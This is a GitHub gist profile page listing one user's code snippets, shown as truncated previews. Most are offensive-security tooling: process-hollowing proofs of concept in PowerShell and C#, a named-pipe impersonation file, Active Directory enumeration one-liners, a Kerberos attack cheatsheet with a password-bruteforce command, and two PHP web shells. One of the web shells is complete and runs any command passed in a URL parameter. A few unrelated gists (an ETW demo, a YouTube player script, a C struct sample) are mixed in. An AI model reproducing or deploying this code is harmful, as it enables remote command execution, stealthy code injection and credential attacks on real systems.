Skip to content

Instantly share code, notes, and snippets.

View UserXGnu's full-sized avatar

UserX UserXGnu

110 followers · 17 following
View GitHub Profile
@UserXGnu
UserXGnu / dotnet_etw.c
Last active March 7, 2022 12:54 — forked from xpn/dotnet_etw.c
A demo of how to collect information on basic .NET events from ETW.
#define AssemblyDCStart_V1 155
#define MethodLoadVerbose_V1 143
#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>
#include <wmistr.h>
#include <evntrace.h>
#include <Evntcons.h>
@UserXGnu
UserXGnu / NamedPipeImpersonation.cs
Created February 19, 2022 13:41 — forked from S3cur3Th1sSh1t/NamedPipeImpersonation.cs
using System;
using System.IO;
using System.Text;
using System.IO.Pipes;
using System.Threading;
using System.Diagnostics;
using System.Security.Principal;
using System.Security.AccessControl;
using System.Runtime.InteropServices;
using System.ComponentModel;
@UserXGnu
UserXGnu / 1) Active Directory One Liners
Created August 15, 2021 17:08 — forked from w00tc/1) Active Directory One Liners
Some Pentesting Notes
Retrieves all of the trust relationships for this domain - Does not Grab Forest Trusts
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Grab Forest Trusts.
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
@UserXGnu
UserXGnu / Start-Hollow.ps1
Created March 19, 2021 10:46 — forked from xenoscr/Start-Hollow.ps1
Process Hollowing with PowerShell - by FuzzySec
function Start-Hollow {
<#
.SYNOPSIS
This is a proof-of-concept for process hollowing. There is nothing new here except
maybe the use of NtCreateProcessEx which has some advantages in that it offers a
convenient way to set a parent process and avoids the bothersome Get/SetThreadContext.
On the flipside CreateRemoteThreadEx/NtCreateThreadEx are pretty suspicious API's.
I wrote this POC mostly to educate myself on the mechanics of hollowing. It is possible
to load the Hollow from an internal byte array straight into memory but I have not
@UserXGnu
UserXGnu / Hollowing.cs
Created March 17, 2021 12:32 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@UserXGnu
UserXGnu / kerberos_attacks_cheatsheet.md
Created February 19, 2021 15:08 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@UserXGnu
UserXGnu / easy-simple-php-webshell.php
Created July 12, 2019 09:36 — forked from joswr1ght/easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if($_GET['cmd'])
{
@UserXGnu
UserXGnu / youtube-mplayer.sh
Created February 20, 2019 11:08
Play youtube videos from console using mplayer and youtube-dl
#!/usr/bin/env bash
youtube-dl -q -o- "$*" | mplayer -af scaletempo -softvol -softvol-max 400 -cache 8192 -
# Usage:
# youtube-mplayer.sh https://www.youtube.com/watch?v=v-OS-DgxuFo
@UserXGnu
UserXGnu / php rce
Created November 5, 2018 11:34
Php RCE
<?php
echo "<pre>";
echo shell_exec($_GET['cmd']);
echo "</pre>";
?>
@UserXGnu
UserXGnu / CObject_Sample.c
Last active October 30, 2017 01:03
#include <stdio.h>
typedef struct _a {
void (*msg)(void);
} A;
typedef struct _b {
A parent; // herda as características de A
void (*msg)(void);
} B;